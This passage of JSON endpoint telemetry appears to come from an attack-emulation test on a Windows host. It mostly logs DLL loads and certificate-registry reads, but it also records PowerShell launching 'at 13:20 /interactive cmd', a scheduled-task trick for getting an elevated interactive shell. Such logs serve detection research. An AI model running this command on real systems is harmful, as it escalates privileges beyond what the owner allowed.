"{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"at 13:20 /interactive cmd\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7672, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573803250000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "image_load", - "image_name": 
"msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "command_line": "at 13:20 /interactive cmd", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5964, - "ppid": 7672, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "subtype": "create", - "timestamp": 131883573803349984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}", - "unique_ppid": "{42FC7E13-CC04-5C05-0000-001082DF5601}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, 
- { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "at.exe", - "image_path": "C:\\Windows\\System32\\at.exe", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", 
- "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
